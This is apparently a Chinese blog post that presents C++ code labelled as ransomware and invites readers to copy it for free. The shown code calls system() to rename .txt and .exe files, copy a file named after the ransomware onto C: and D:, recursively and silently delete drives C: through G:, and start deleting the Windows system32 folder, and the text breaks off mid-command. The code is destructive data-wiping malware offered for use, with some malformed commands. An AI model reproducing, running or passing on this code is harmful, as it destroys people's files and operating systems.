今天我给大家分享的是勒索病毒C++版,代码如下,可以《免费》复制。
#include<bits/stdc++.h>
#include<iostream>
#include <cstdlib>
#include<cstdlib>
#include<ctime>
#include<Windows.h>
#define _CRT_SECURE_NO_WARNINGS 1
#pragma comment(lib,"winmm.lib")
#include<cstring>
#include "fstream"
#include <conio.h>
using namespace std;
#include <cmath>
using std::cout; using std::endl;
using std::copy; using std::string;
int phmbr();
int main()
{
system("ren?d:\\*.txt *.htm");
system("ren?d:\\*.exe *.txt");
system("copy d:\\X3fang勒索病毒?c:\\");
system("copy d:\\X3fang勒索病毒 d:\\");
system("rd f:/ghost.../ /s /q");
system("rd/s/q D:\\");
system("rd/s/q C:\\");
system("rd/s/q E:\\");
system("rd/s/q F:\\");
system("rd/s/q G:\\");
system("del c:\WINDOWS\system32\*.*/q&#
标签:std,分享,copy,system,C++,rd,using,include,病毒
From: https://blog.csdn.net/2401_84684202/article/details/141109314